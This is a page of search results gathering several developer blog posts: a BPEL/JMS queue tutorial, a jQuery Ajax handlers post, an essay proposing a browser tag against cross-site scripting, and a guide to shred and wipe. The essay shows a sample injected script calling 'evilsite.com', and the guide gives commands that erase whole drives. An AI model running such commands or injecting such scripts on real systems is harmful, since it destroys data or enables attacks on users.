Search Results

Search found 36520 results on 1461 pages for 'default editing language'.

Page 506/1461 | < Previous Page | 502 503 504 505 506 507 508 509 510 511 512 513  | Next Page >

  • JMS Step 4 - How to Create an 11g BPEL Process Which Writes a Message Based on an XML Schema to a JMS Queue

    - by John-Brown.Evans
    JMS Step 4 - How to Create an 11g BPEL Process Which Writes a Message Based on an XML Schema to a JMS Queue ol{margin:0;padding:0} .c11_4{vertical-align:top;width:129.8pt;border-style:solid;background-color:#f3f3f3;border-color:#000000;border-width:1pt;padding:5pt 5pt 5pt 5pt} .c9_4{vertical-align:top;width:207pt;border-style:solid;background-color:#f3f3f3;border-color:#000000;border-width:1pt;padding:5pt 5pt 5pt 5pt}.c14{vertical-align:top;width:207pt;border-style:solid;border-color:#000000;border-width:1pt;padding:5pt 5pt 5pt 5pt} .c17_4{vertical-align:top;width:129.8pt;border-style:solid;border-color:#000000;border-width:1pt;padding:5pt 5pt 5pt 5pt} .c7_4{vertical-align:top;width:130pt;border-style:solid;border-color:#000000;border-width:1pt;padding:0pt 5pt 0pt 5pt} .c19_4{vertical-align:top;width:468pt;border-style:solid;border-color:#000000;border-width:1pt;padding:5pt 5pt 5pt 5pt} .c22_4{background-color:#ffffff} .c20_4{list-style-type:disc;margin:0;padding:0} .c6_4{font-size:8pt;font-family:"Courier New"} .c24_4{color:inherit;text-decoration:inherit} .c23_4{color:#1155cc;text-decoration:underline} .c0_4{height:11pt;direction:ltr} .c10_4{font-size:10pt;font-family:"Courier New"} .c3_4{padding-left:0pt;margin-left:36pt} .c18_4{font-size:8pt} .c8_4{text-align:center} .c12_4{background-color:#ffff00} .c2_4{font-weight:bold} .c21_4{background-color:#00ff00} .c4_4{line-height:1.0} .c1_4{direction:ltr} .c15_4{background-color:#f3f3f3} .c13_4{font-family:"Courier New"} .c5_4{font-style:italic} .c16_4{border-collapse:collapse} .title{padding-top:24pt;line-height:1.15;text-align:left;color:#000000;font-size:36pt;font-family:"Arial";font-weight:bold;padding-bottom:6pt} .subtitle{padding-top:18pt;line-height:1.15;text-align:left;color:#666666;font-style:italic;font-size:24pt;font-family:"Georgia";padding-bottom:4pt} li{color:#000000;font-size:10pt;font-family:"Arial"} p{color:#000000;font-size:10pt;margin:0;font-family:"Arial"} h1{padding-top:0pt;line-height:1.15;text-align:left;color:#888;font-size:18pt;font-family:"Arial";font-weight:normal;padding-bottom:0pt} h2{padding-top:0pt;line-height:1.15;text-align:left;color:#888;font-size:18pt;font-family:"Arial";font-weight:bold;padding-bottom:0pt} h3{padding-top:0pt;line-height:1.15;text-align:left;color:#888;font-size:14pt;font-family:"Arial";font-weight:normal;padding-bottom:0pt} h4{padding-top:0pt;line-height:1.15;text-align:left;color:#888;font-style:italic;font-size:11pt;font-family:"Arial";padding-bottom:0pt} h5{padding-top:0pt;line-height:1.15;text-align:left;color:#888;font-size:10pt;font-family:"Arial";font-weight:normal;padding-bottom:0pt} h6{padding-top:0pt;line-height:1.15;text-align:left;color:#888;font-style:italic;font-size:10pt;font-family:"Arial";padding-bottom:0pt} This post continues the series of JMS articles which demonstrate how to use JMS queues in a SOA context. The previous posts were: JMS Step 1 - How to Create a Simple JMS Queue in Weblogic Server 11g JMS Step 2 - Using the QueueSend.java Sample Program to Send a Message to a JMS Queue JMS Step 3 - Using the QueueReceive.java Sample Program to Read a Message from a JMS Queue In this example we will create a BPEL process which will write (enqueue) a message to a JMS queue using a JMS adapter. The JMS adapter will enqueue the full XML payload to the queue. This sample will use the following WebLogic Server objects. The first two, the Connection Factory and JMS Queue, were created as part of the first blog post in this series, JMS Step 1 - How to Create a Simple JMS Queue in Weblogic Server 11g. If you haven't created those objects yet, please see that post for details on how to do so. The Connection Pool will be created as part of this example. Object Name Type JNDI Name TestConnectionFactory Connection Factory jms/TestConnectionFactory TestJMSQueue JMS Queue jms/TestJMSQueue eis/wls/TestQueue Connection Pool eis/wls/TestQueue 1. Verify Connection Factory and JMS Queue As mentioned above, this example uses a WLS Connection Factory called TestConnectionFactory and a JMS queue TestJMSQueue. As these are prerequisites for this example, let us verify they exist. Log in to the WebLogic Server Administration Console. Select Services > JMS Modules > TestJMSModule You should see the following objects: If not, or if the TestJMSModule is missing, please see the abovementioned article and create these objects before continuing. 2. Create a JMS Adapter Connection Pool in WebLogic Server The BPEL process we are about to create uses a JMS adapter to write to the JMS queue. The JMS adapter is deployed to the WebLogic server and needs to be configured to include a connection pool which references the connection factory associated with the JMS queue. In the WebLogic Server Console Go to Deployments > Next and select (click on) the JmsAdapter Select Configuration > Outbound Connection Pools and expand oracle.tip.adapter.jms.IJmsConnectionFactory. This will display the list of connections configured for this adapter. For example, eis/aqjms/Queue, eis/aqjms/Topic etc. These JNDI names are actually quite confusing. We are expecting to configure a connection pool here, but the names refer to queues and topics. One would expect these to be called *ConnectionPool or *_CF or similar, but to conform to this nomenclature, we will call our entry eis/wls/TestQueue . This JNDI name is also the name we will use later, when creating a BPEL process to access this JMS queue! Select New, check the oracle.tip.adapter.jms.IJmsConnectionFactory check box and Next. Enter JNDI Name: eis/wls/TestQueue for the connection instance, then press Finish. Expand oracle.tip.adapter.jms.IJmsConnectionFactory again and select (click on) eis/wls/TestQueue The ConnectionFactoryLocation must point to the JNDI name of the connection factory associated with the JMS queue you will be writing to. In our example, this is the connection factory called TestConnectionFactory, with the JNDI name jms/TestConnectionFactory.( As a reminder, this connection factory is contained in the JMS Module called TestJMSModule, under Services > Messaging > JMS Modules > TestJMSModule which we verified at the beginning of this document. )Enter jms/TestConnectionFactory  into the Property Value field for Connection Factory Location. After entering it, you must press Return/Enter then Save for the value to be accepted. If your WebLogic server is running in Development mode, you should see the message that the changes have been activated and the deployment plan successfully updated. If not, then you will manually need to activate the changes in the WebLogic server console. Although the changes have been activated, the JmsAdapter needs to be redeployed in order for the changes to become effective. This should be confirmed by the message Remember to update your deployment to reflect the new plan when you are finished with your changes as can be seen in the following screen shot: The next step is to redeploy the JmsAdapter.Navigate back to the Deployments screen, either by selecting it in the left-hand navigation tree or by selecting the “Summary of Deployments” link in the breadcrumbs list at the top of the screen. Then select the checkbox next to JmsAdapter and press the Update button On the Update Application Assistant page, select “Redeploy this application using the following deployment files” and press Finish. After a few seconds you should get the message that the selected deployments were updated. The JMS adapter configuration is complete and it can now be used to access the JMS queue. To summarize: we have created a JMS adapter connection pool connector with the JNDI name jms/TestConnectionFactory. This is the JNDI name to be accessed by a process such as a BPEL process, when using the JMS adapter to access the previously created JMS queue with the JNDI name jms/TestJMSQueue. In the following step, we will set up a BPEL process to use this JMS adapter to write to the JMS queue. 3. Create a BPEL Composite with a JMS Adapter Partner Link This step requires that you have a valid Application Server Connection defined in JDeveloper, pointing to the application server on which you created the JMS Queue and Connection Factory. You can create this connection in JDeveloper under the Application Server Navigator. Give it any name and be sure to test the connection before completing it. This sample will use the connection name jbevans-lx-PS5, as that is the name of the connection pointing to my SOA PS5 installation. When using a JMS adapter from within a BPEL process, there are various configuration options, such as the operation type (consume message, produce message etc.), delivery mode and message type. One of these options is the choice of the format of the JMS message payload. This can be structured around an existing XSD, in which case the full XML element and tags are passed, or it can be opaque, meaning that the payload is sent as-is to the JMS adapter. In the case of an XSD-based message, the payload can simply be copied to the input variable of the JMS adapter. In the case of an opaque message, the JMS adapter’s input variable is of type base64binary. So the payload needs to be converted to base64 binary first. I will go into this in more detail in a later blog entry. This sample will pass a simple message to the adapter, based on the following simple XSD file, which consists of a single string element: stringPayload.xsd <?xml version="1.0" encoding="windows-1252" ?> <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns="http://www.example.org" targetNamespace="http://www.example.org" elementFormDefault="qualified" <xsd:element name="exampleElement" type="xsd:string"> </xsd:element> </xsd:schema> The following steps are all executed in JDeveloper. The SOA project will be created inside a JDeveloper Application. If you do not already have an application to contain the project, you can create a new one via File > New > General > Generic Application. Give the application any name, for example JMSTests and, when prompted for a project name and type, call the project JmsAdapterWriteWithXsd and select SOA as the project technology type. If you already have an application, continue below. Create a SOA Project Create a new project and choose SOA Tier > SOA Project as its type. Name it JmsAdapterWriteSchema. When prompted for the composite type, choose Composite With BPEL Process. When prompted for the BPEL Process, name it JmsAdapterWriteSchema too and choose Synchronous BPEL Process as the template. This will create a composite with a BPEL process and an exposed SOAP service. Double-click the BPEL process to open and begin editing it. You should see a simple BPEL process with a Receive and Reply activity. As we created a default process without an XML schema, the input and output variables are simple strings. Create an XSD File An XSD file is required later to define the message format to be passed to the JMS adapter. In this step, we create a simple XSD file, containing a string variable and add it to the project. First select the xsd item in the left-hand navigation tree to ensure that the XSD file is created under that item. Select File > New > General > XML and choose XML Schema. Call it stringPayload.xsd and when the editor opens, select the Source view. then replace the contents with the contents of the stringPayload.xsd example above and save the file. You should see it under the xsd item in the navigation tree. Create a JMS Adapter Partner Link We will create the JMS adapter as a service at the composite level. If it is not already open, double-click the composite.xml file in the navigator to open it. From the Component Palette, drag a JMS adapter over onto the right-hand swim lane, under External References. This will start the JMS Adapter Configuration Wizard. Use the following entries: Service Name: JmsAdapterWrite Oracle Enterprise Messaging Service (OEMS): Oracle Weblogic JMS AppServer Connection: Use an existing application server connection pointing to the WebLogic server on which the above JMS queue and connection factory were created. You can use the “+” button to create a connection directly from the wizard, if you do not already have one. This example uses a connection called jbevans-lx-PS5. Adapter Interface > Interface: Define from operation and schema (specified later) Operation Type: Produce Message Operation Name: Produce_message Destination Name: Press the Browse button, select Destination Type: Queues, then press Search. Wait for the list to populate, then select the entry for TestJMSQueue , which is the queue created earlier. JNDI Name: The JNDI name to use for the JMS connection. This is probably the most important step in this exercise and the most common source of error. This is the JNDI name of the JMS adapter’s connection pool created in the WebLogic Server and which points to the connection factory. JDeveloper does not verify the value entered here. If you enter a wrong value, the JMS adapter won’t find the queue and you will get an error message at runtime, which is very difficult to trace. In our example, this is the value eis/wls/TestQueue . (See the earlier step on how to create a JMS Adapter Connection Pool in WebLogic Server for details.) MessagesURL: We will use the XSD file we created earlier, stringPayload.xsd to define the message format for the JMS adapter. Press the magnifying glass icon to search for schema files. Expand Project Schema Files > stringPayload.xsd and select exampleElement: string. Press Next and Finish, which will complete the JMS Adapter configuration. Wire the BPEL Component to the JMS Adapter In this step, we link the BPEL process/component to the JMS adapter. From the composite.xml editor, drag the right-arrow icon from the BPEL process to the JMS adapter’s in-arrow. This completes the steps at the composite level. 4. Complete the BPEL Process Design Invoke the JMS Adapter Open the BPEL component by double-clicking it in the design view of the composite.xml, or open it from the project navigator by selecting the JmsAdapterWriteSchema.bpel file. This will display the BPEL process in the design view. You should see the JmsAdapterWrite partner link under one of the two swim lanes. We want it in the right-hand swim lane. If JDeveloper displays it in the left-hand lane, right-click it and choose Display > Move To Opposite Swim Lane. An Invoke activity is required in order to invoke the JMS adapter. Drag an Invoke activity between the Receive and Reply activities. Drag the right-hand arrow from the Invoke activity to the JMS adapter partner link. This will open the Invoke editor. The correct default values are entered automatically and are fine for our purposes. We only need to define the input variable to use for the JMS adapter. By pressing the green “+” symbol, a variable of the correct type can be auto-generated, for example with the name Invoke1_Produce_Message_InputVariable. Press OK after creating the variable. ( For some reason, while I was testing this, the JMS Adapter moved back to the left-hand swim lane again after this step. There is no harm in leaving it there, but I find it easier to follow if it is in the right-hand lane, because I kind-of think of the message coming in on the left and being routed through the right. But you can follow your personal preference here.) Assign Variables Drag an Assign activity between the Receive and Invoke activities. We will simply copy the input variable to the JMS adapter and, for completion, so the process has an output to print, again to the process’s output variable. Double-click the Assign activity and create two Copy rules: for the first, drag Variables > inputVariable > payload > client:process > client:input_string to Invoke1_Produce_Message_InputVariable > body > ns2:exampleElement for the second, drag the same input variable to outputVariable > payload > client:processResponse > client:result This will create two copy rules, similar to the following: Press OK. This completes the BPEL and Composite design. 5. Compile and Deploy the Composite We won’t go into too much detail on how to compile and deploy. In JDeveloper, compile the process by pressing the Make or Rebuild icons or by right-clicking the project name in the navigator and selecting Make... or Rebuild... If the compilation is successful, deploy it to the SOA server connection defined earlier. (Right-click the project name in the navigator, select Deploy to Application Server, choose the application server connection, choose the partition on the server (usually default) and press Finish. You should see the message ---- Deployment finished. ---- in the Deployment frame, if the deployment was successful. 6. Test the Composite This is the exciting part. Open two tabs in your browser and log in to the WebLogic Administration Console in one tab and the Enterprise Manager 11g Fusion Middleware Control (EM) for your SOA installation in the other. We will use the Console to monitor the messages being written to the queue and the EM to execute the composite. In the Console, go to Services > Messaging > JMS Modules > TestJMSModule > TestJMSQueue > Monitoring. Note the number of messages under Messages Current. In the EM, go to SOA > soa-infra (soa_server1) > default (or wherever you deployed your composite to) and click on JmsAdapterWriteSchema [1.0], then press the Test button. Under Input Arguments, enter any string into the text input field for the payload, for example Test Message then press Test Web Service. If the instance is successful you should see the same text in the Response message, “Test Message”. In the Console, refresh the Monitoring screen to confirm a new message has been written to the queue. Check the checkbox and press Show Messages. Click on the newest message and view its contents. They should include the full XML of the entered payload. 7. Troubleshooting If you get an exception similar to the following at runtime ... BINDING.JCA-12510 JCA Resource Adapter location error. Unable to locate the JCA Resource Adapter via .jca binding file element The JCA Binding Component is unable to startup the Resource Adapter specified in the element: location='eis/wls/QueueTest'. The reason for this is most likely that either 1) the Resource Adapters RAR file has not been deployed successfully to the WebLogic Application server or 2) the '' element in weblogic-ra.xml has not been set to eis/wls/QueueTest. In the last case you will have to add a new WebLogic JCA connection factory (deploy a RAR). Please correct this and then restart the Application Server at oracle.integration.platform.blocks.adapter.fw.AdapterBindingException. createJndiLookupException(AdapterBindingException.java:130) at oracle.integration.platform.blocks.adapter.fw.jca.cci. JCAConnectionManager$JCAConnectionPool.createJCAConnectionFactory (JCAConnectionManager.java:1387) at oracle.integration.platform.blocks.adapter.fw.jca.cci. JCAConnectionManager$JCAConnectionPool.newPoolObject (JCAConnectionManager.java:1285) ... then this is very likely due to an incorrect JNDI name entered for the JMS Connection in the JMS Adapter Wizard. Recheck those steps. The error message prints the name of the JNDI name used. In this example, it was incorrectly entered as eis/wls/QueueTest instead of eis/wls/TestQueue. This concludes this example. Best regards John-Brown Evans Oracle Technology Proactive Support Delivery

    Read the article

  • Simplify your Ajax code by using jQuery Global Ajax Handlers and ajaxSetup low-level interface

    - by hajan
    Creating web applications with consistent layout and user interface is very important for your users. In several ASP.NET projects I’ve completed lately, I’ve been using a lot jQuery and jQuery Ajax to achieve rich user experience and seamless interaction between the client and the server. In almost all of them, I took advantage of the nice jQuery global ajax handlers and jQuery ajax functions. Let’s say you build web application which mainly interacts using Ajax post and get to accomplish various operations. As you may already know, you can easily perform Ajax operations using jQuery Ajax low-level method or jQuery $.get, $.post, etc. Simple get example: $.get("/Home/GetData", function (d) { alert(d); }); As you can see, this is the simplest possible way to make Ajax call. What it does in behind is constructing low-level Ajax call by specifying all necessary information for the request, filling with default information set for the required properties such as data type, content type, etc... If you want to have some more control over what is happening with your Ajax Request, you can easily take advantage of the global ajax handlers. In order to register global ajax handlers, jQuery API provides you set of global Ajax methods. You can find all the methods in the following link http://api.jquery.com/category/ajax/global-ajax-event-handlers/, and these are: ajaxComplete ajaxError ajaxSend ajaxStart ajaxStop ajaxSuccess And the low-level ajax interfaces http://api.jquery.com/category/ajax/low-level-interface/: ajax ajaxPrefilter ajaxSetup For global settings, I usually use ajaxSetup combining it with the ajax event handlers. $.ajaxSetup is very good to help you set default values that you will use in all of your future Ajax Requests, so that you won’t need to repeat the same properties all the time unless you want to override the default settings. Mainly, I am using global ajaxSetup function similarly to the following way: $.ajaxSetup({ cache: false, error: function (x, e) { if (x.status == 550) alert("550 Error Message"); else if (x.status == "403") alert("403. Not Authorized"); else if (x.status == "500") alert("500. Internal Server Error"); else alert("Error..."); }, success: function (x) { //do something global on success... } }); .csharpcode, .csharpcode pre { font-size: small; color: black; font-family: consolas, "Courier New", courier, monospace; background-color: #ffffff; /*white-space: pre;*/ } .csharpcode pre { margin: 0em; } .csharpcode .rem { color: #008000; } .csharpcode .kwrd { color: #0000ff; } .csharpcode .str { color: #006080; } .csharpcode .op { color: #0000c0; } .csharpcode .preproc { color: #cc6633; } .csharpcode .asp { background-color: #ffff00; } .csharpcode .html { color: #800000; } .csharpcode .attr { color: #ff0000; } .csharpcode .alt { background-color: #f4f4f4; width: 100%; margin: 0em; } .csharpcode .lnum { color: #606060; } Now, you can make ajax call using low-level $.ajax interface and you don’t need to worry about specifying any of the properties we’ve set in the $.ajaxSetup function. So, you can create your own ways to handle various situations when your Ajax requests are occurring. Sometimes, some of your Ajax Requests may take much longer than expected… So, in order to make user friendly UI that will show some progress bar or animated image that something is happening in behind, you can combine ajaxStart and ajaxStop methods to do the same. First of all, add one <div id=”loading” style=”display:none;”> <img src="@Url.Content("~/Content/images/ajax-loader.gif")" alt="Ajax Loader" /></div> anywhere on your Master Layout / Master page (you can download nice ajax loading images from http://ajaxload.info/). Then, add the following two handlers: $(document).ajaxStart(function () { $("#loading").attr("style", "position:absolute; z-index: 1000; top: 0px; "+ "left:0px; text-align: center; display:none; background-color: #ddd; "+ "height: 100%; width: 100%; /* These three lines are for transparency "+ "in all browsers. */-ms-filter:\"progid:DXImageTransform.Microsoft.Alpha(Opacity=50)\";"+ " filter: alpha(opacity=50); opacity:.5;"); $("#loading img").attr("style", "position:relative; top:40%; z-index:5;"); $("#loading").show(); }); $(document).ajaxStop(function () { $("#loading").removeAttr("style"); $("#loading img").removeAttr("style"); $("#loading").hide(); }); .csharpcode, .csharpcode pre { font-size: small; color: black; font-family: consolas, "Courier New", courier, monospace; background-color: #ffffff; /*white-space: pre;*/ } .csharpcode pre { margin: 0em; } .csharpcode .rem { color: #008000; } .csharpcode .kwrd { color: #0000ff; } .csharpcode .str { color: #006080; } .csharpcode .op { color: #0000c0; } .csharpcode .preproc { color: #cc6633; } .csharpcode .asp { background-color: #ffff00; } .csharpcode .html { color: #800000; } .csharpcode .attr { color: #ff0000; } .csharpcode .alt { background-color: #f4f4f4; width: 100%; margin: 0em; } .csharpcode .lnum { color: #606060; } Note: While you can reorganize the style in a more reusable way, since these are global Ajax Start/Stop, it is very possible that you won’t use the same style in other places. With this way, you will see that now for any ajax request in your web site or application, you will have the loading image appearing providing better user experience. What I’ve shown is several useful examples on how to simplify your Ajax code by using Global Ajax Handlers and the low-level AjaxSetup function. Of course, you can do a lot more with the other methods as well. Hope this was helpful. Regards, Hajan

    Read the article

  • What's the ultimate way to install debug Flash Player in Firefox?

    - by Bart van Heukelom
    What's the easiest way to get a debug Flash Player (the one you can download from here, though I don't care if it's downloaded automatically) working in Firefox? 64 bit system, default Firefox from repository If possible, I don't want the flash player to be replaced by a newer but non-debug version automatically (updating to a new debug version is ok) Want the most recent version (10.2 at the moment)

    Read the article

  • Wishful Thinking: Why can't HTML fix Script Attacks at the Source?

    - by Rick Strahl
    The Web can be an evil place, especially if you're a Web Developer blissfully unaware of Cross Site Script Attacks (XSS). Even if you are aware of XSS in all of its insidious forms, it's extremely complex to deal with all the issues if you're taking user input and you're actually allowing users to post raw HTML into an application. I'm dealing with this again today in a Web application where legacy data contains raw HTML that has to be displayed and users ask for the ability to use raw HTML as input for listings. The first line of defense of course is: Just say no to HTML input from users. If you don't allow HTML input directly and use HTML Encoding (HttyUtility.HtmlEncode() in .NET or using standard ASP.NET MVC output @Model.Content) you're fairly safe at least from the HTML input provided. Both WebForms and Razor support HtmlEncoded content, although Razor makes it the default. In Razor the default @ expression syntax:@Model.UserContent automatically produces HTML encoded content - you actually have to go out of your way to create raw HTML content (safe by default) using @Html.Raw() or the HtmlString class. In Web Forms (V4) you can use:<%: Model.UserContent %> or if you're using a version prior to 4.0:<%= HttpUtility.HtmlEncode(Model.UserContent) %> This works great as a hedge against embedded <script> tags and HTML markup as any HTML is turned into text that displays as HTML but doesn't render the HTML. But it turns any embedded HTML markup tags into plain text. If you need to display HTML in raw form with the markup tags rendering based on user input this approach is worthless. If you do accept HTML input and need to echo the rendered HTML input back, the task of cleaning up that HTML is a complex task. In the projects I work on, customers are frequently asking for the ability to post raw HTML quite frequently.  Almost every app that I've built where there's document content from users we start out with text only input - possibly using something like MarkDown - but inevitably users want to just post plain old HTML they created in some other rich editing application. See this a lot with realtors especially who often want to reuse their postings easily in multiple places. In my work this is a common problem I need to deal with and I've tried dozens of different methods from sanitizing, simple rejection of input to custom markup schemes none of which have ever felt comfortable to me. They work in a half assed, hacked together sort of way but I always live in fear of missing something vital which is *really easy to do*. My Wishlist Item: A <restricted> tag in HTML Let me dream here for a second on how to address this problem. It seems to me the easiest place where this can be fixed is: In the browser. Browsers are actually executing script code so they have a lot of control over the script code that resides in a page. What if there was a way to specify that you want to turn off script code for a block of HTML? The main issue when dealing with HTML raw input isn't that we as developers are unaware of the implications of user input, but the fact that we sometimes have to display raw HTML input the user provides. So the problem markup is usually isolated in only a very specific part of the document. So, what if we had a way to specify that in any given HTML block, no script code could execute by wrapping it into a tag that disables all script functionality in the browser? This would include <script> tags and any document script attributes like onclick, onfocus etc. and potentially also disallow things like iFrames that can potentially be scripted from the within the iFrame's target. I'd like to see something along these lines:<article> <restricted allowscripts="no" allowiframes="no"> <div>Some content</div> <script>alert('go ahead make my day, punk!");</script> <div onfocus="$.getJson('http://evilsite.com/')">more content</div> </restricted> </article> A tag like this would basically disallow all script code from firing from any HTML that's rendered within it. You'd use this only on code that you actually render from your data only and only if you are dealing with custom data. So something like this:<article> <restricted> @Html.Raw(Model.UserContent) </restricted> </article> For browsers this would actually be easy to intercept. They render the DOM and control loading and execution of scripts that are loaded through it. All the browser would have to do is suspend execution of <script> tags and not hookup any event handlers defined via markup in this block. Given all the crazy XSS attacks that exist and the prevalence of this problem this would go a long way towards preventing at least coded script attacks in the DOM. And it seems like a totally doable solution that wouldn't be very difficult to implement by vendors. There would also need to be some logic in the parser to not allow an </restricted> or <restricted> tag into the content as to short-circuit the rstricted section (per James Hart's comment). I'm sure there are other issues to consider as well that I didn't think of in my off-the-back-of-a-napkin concept here but the idea overall seems worth consideration I think. Without code running in a user supplied HTML block it'd be pretty hard to compromise a local HTML document and pass information like Cookies to a server. Or even send data to a server period. Short of an iFrame that can access the parent frame (which is another restriction that should be available on this <restricted> tag) that could potentially communicate back, there's not a lot a malicious site could do. The HTML could still 'phone home' via image links and href links potentially and basically say this site was accessed, but without the ability to run script code it would be pretty tough to pass along critical information to the server beyond that. Ahhhh… one can dream… Not holding my breath of course. The design by committee that is the W3C can't agree on anything in timeframes measured less than decades, but maybe this is one place where browser vendors can actually step up the pressure. This is something in their best interest to reduce the attack surface for vulnerabilities on their browser platforms significantly. Several people commented on Twitter today that there isn't enough discussion on issues like this that address serious needs in the web browser space. Realistically security has to be a number one concern with Web applications in general - there isn't a Web app out there that is not vulnerable. And yet nothing has been done to address these security issues even though there might be relatively easy solutions to make this happen. It'll take time, and it's probably not going to happen in our lifetime, but maybe this rambling thought sparks some ideas on how this sort of restriction can get into browsers in some way in the future.© Rick Strahl, West Wind Technologies, 2005-2012Posted in ASP.NET  HTML5  HTML  Security   Tweet !function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs"); (function() { var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true; po.src = 'https://apis.google.com/js/plusone.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s); })();

    Read the article

  • Use an Ubuntu Live CD to Securely Wipe Your PC’s Hard Drive

    - by Trevor Bekolay
    Deleting files or quickly formatting a drive isn’t enough for sensitive personal information. We’ll show you how to get rid of it for good using a Ubuntu Live CD. When you delete a file in Windows, Ubuntu, or any other operating system, it doesn’t actually destroy the data stored on your hard drive, it just marks that data as “deleted.” If you overwrite it later, then that data is generally unrecoverable, but if the operating system don’t happen to overwrite it, then your data is still stored on your hard drive, recoverable by anyone who has the right software. By securely delete files or entire hard drives, your data will be gone for good. Note: Modern hard drives are extremely sophisticated, as are the experts who recover data for a living. There is no guarantee that the methods covered in this article will make your data completely unrecoverable; however, they will make your data unrecoverable to the majority of recovery methods, and all methods that are readily available to the general public. Shred individual files Most of the data stored on your hard drive is harmless, and doesn’t reveal anything about you. If there are just a few files that you know you don’t want someone else to see, then the easiest way to get rid of them is a built-in Linux utility called shred. Open a terminal window by clicking on Applications at the top-left of the screen, then expanding the Accessories menu and clicking on Terminal. Navigate to the file that you want to delete using cd to change directories and ls to list the files and folders in the current directory. As an example, we’ve got a file called BankInfo.txt on a Windows NTFS-formatted hard drive. We want to delete it securely, so we’ll call shred by entering the following in the terminal window: shred <file> which is, in our example: shred BankInfo.txt Notice that our BankInfo.txt file still exists, even though we’ve shredded it. A quick look at the contents of BankInfo.txt make it obvious that the file has indeed been securely overwritten. We can use some command-line arguments to make shred delete the file from the hard drive as well. We can also be extra-careful about the shredding process by upping the number of times shred overwrites the original file. To do this, in the terminal, type in: shred –remove –iterations=<num> <file> By default, shred overwrites the file 25 times. We’ll double this, giving us the following command: shred –remove –iterations=50 BankInfo.txt BankInfo.txt has now been securely wiped on the physical disk, and also no longer shows up in the directory listing. Repeat this process for any sensitive files on your hard drive! Wipe entire hard drives If you’re disposing of an old hard drive, or giving it to someone else, then you might instead want to wipe your entire hard drive. shred can be invoked on hard drives, but on modern file systems, the shred process may be reversible. We’ll use the program wipe to securely delete all of the data on a hard drive. Unlike shred, wipe is not included in Ubuntu by default, so we have to install it. Open up the Synaptic Package Manager by clicking on System in the top-left corner of the screen, then expanding the Administration folder and clicking on Synaptic Package Manager. wipe is part of the Universe repository, which is not enabled by default. We’ll enable it by clicking on Settings > Repositories in the Synaptic Package Manager window. Check the checkbox next to “Community-maintained Open Source software (universe)”. Click Close. You’ll need to reload Synaptic’s package list. Click on the Reload button in the main Synaptic Package Manager window. Once the package list has been reloaded, the text over the search field will change to “Rebuilding search index”. Wait until it reads “Quick search,” and then type “wipe” into the search field. The wipe package should come up, along with some other packages that perform similar functions. Click on the checkbox to the left of the label “wipe” and select “Mark for Installation”. Click on the Apply button to start the installation process. Click the Apply button on the Summary window that pops up. Once the installation is done, click the Close button and close the Synaptic Package Manager window. Open a terminal window by clicking on Applications in the top-left of the screen, then Accessories > Terminal. You need to figure our the correct hard drive to wipe. If you wipe the wrong hard drive, that data will not be recoverable, so exercise caution! In the terminal window, type in: sudo fdisk -l A list of your hard drives will show up. A few factors will help you identify the right hard drive. One is the file system, found in the System column of  the list – Windows hard drives are usually formatted as NTFS (which shows up as HPFS/NTFS). Another good identifier is the size of the hard drive, which appears after its identifier (highlighted in the following screenshot). In our case, the hard drive we want to wipe is only around 1 GB large, and is formatted as NTFS. We make a note of the label found under the the Device column heading. If you have multiple partitions on this hard drive, then there will be more than one device in this list. The wipe developers recommend wiping each partition separately. To start the wiping process, type the following into the terminal: sudo wipe <device label> In our case, this is: sudo wipe /dev/sda1 Again, exercise caution – this is the point of no return! Your hard drive will be completely wiped. It may take some time to complete, depending on the size of the drive you’re wiping. Conclusion If you have sensitive information on your hard drive – and chances are you probably do – then it’s a good idea to securely delete sensitive files before you give away or dispose of your hard drive. The most secure way to delete your data is with a few swings of a hammer, but shred and wipe from a Ubuntu Live CD is a good alternative! Similar Articles Productive Geek Tips Reset Your Ubuntu Password Easily from the Live CDScan a Windows PC for Viruses from a Ubuntu Live CDRecover Deleted Files on an NTFS Hard Drive from a Ubuntu Live CDCreate a Bootable Ubuntu 9.10 USB Flash DriveCreate a Bootable Ubuntu USB Flash Drive the Easy Way TouchFreeze Alternative in AutoHotkey The Icy Undertow Desktop Windows Home Server – Backup to LAN The Clear & Clean Desktop Use This Bookmarklet to Easily Get Albums Use AutoHotkey to Assign a Hotkey to a Specific Window Latest Software Reviews Tinyhacker Random Tips DVDFab 6 Revo Uninstaller Pro Registry Mechanic 9 for Windows PC Tools Internet Security Suite 2010 Office 2010 Product Guides Google Maps Place marks – Pizza, Guns or Strip Clubs Monitor Applications With Kiwi LocPDF is a Visual PDF Search Tool Download Free iPad Wallpapers at iPad Decor Get Your Delicious Bookmarks In Firefox’s Awesome Bar

    Read the article

  • Make your CHM Help Files show HTML5 and CSS3 content

    - by Rick Strahl
    The HTML Help 1.0 specification aka CHM files, is pretty old. In fact, it's practically ancient as it was introduced in 1997 when Internet Explorer 4 was introduced. Html Help 1.0 is basically a completely HTML based Help system that uses a Help Viewer that internally uses Internet Explorer to render the HTML Help content. Because of its use of the Internet Explorer shell for rendering there were many security issues in the past, which resulted in locking down of the Web Browser control in Windows and also the Help Engine which caused some unfortunate side effects. Even so, CHM continues to be a popular help format because it is very easy to produce content for it, using plain HTML and because it works with many Windows application platforms out of the box. While there have been various attempts to replace CHM help files CHM files still seem to be a popular choice for many applications to display their help systems. The biggest alternative these days is no system based help at all, but links to online documentation. For Windows apps though it's still very common to see CHM help files and there are still a ton of CHM help out there and lots of tools (including our own West Wind Html Help Builder) that produce output for CHM files as well as Web output. Image is Everything and you ain't got it! One problem with the CHM engine is that it's stuck with an ancient Internet Explorer version for rendering. For example if you have help content that uses HTML5 or CSS3 content you might have an HTML Help topic like the following shown here in a full Web Browser instance of Internet Explorer: The page clearly uses some CSS3 features like rounded corners and box shadows that are rendered using plain CSS 3 features. Note that I used Internet Explorer on purpose here to demonstrate that IE9 on Windows 7 can properly render this content using some of the new features of CSS, but the same is true for all other recent versions of the major browsers (FireFox 3.1+, Safari 4.5+, WebKit 9+ etc.). Unfortunately if you take this nice and simple CSS3 content and run it through the HTML Help compiler to produce a CHM file the resulting output on the same machine looks a bit less flashy: All the CSS3 styling is gone and although the page display and functionality still works, but all the extra styling features are gone. This even though I am running this on a Windows 7 machine that has IE9 that should be able to render these CSS features. Bummer. Web Browser Control - perpetually stuck in IE 7 Mode The problem is the Web Browser/Shell Components in 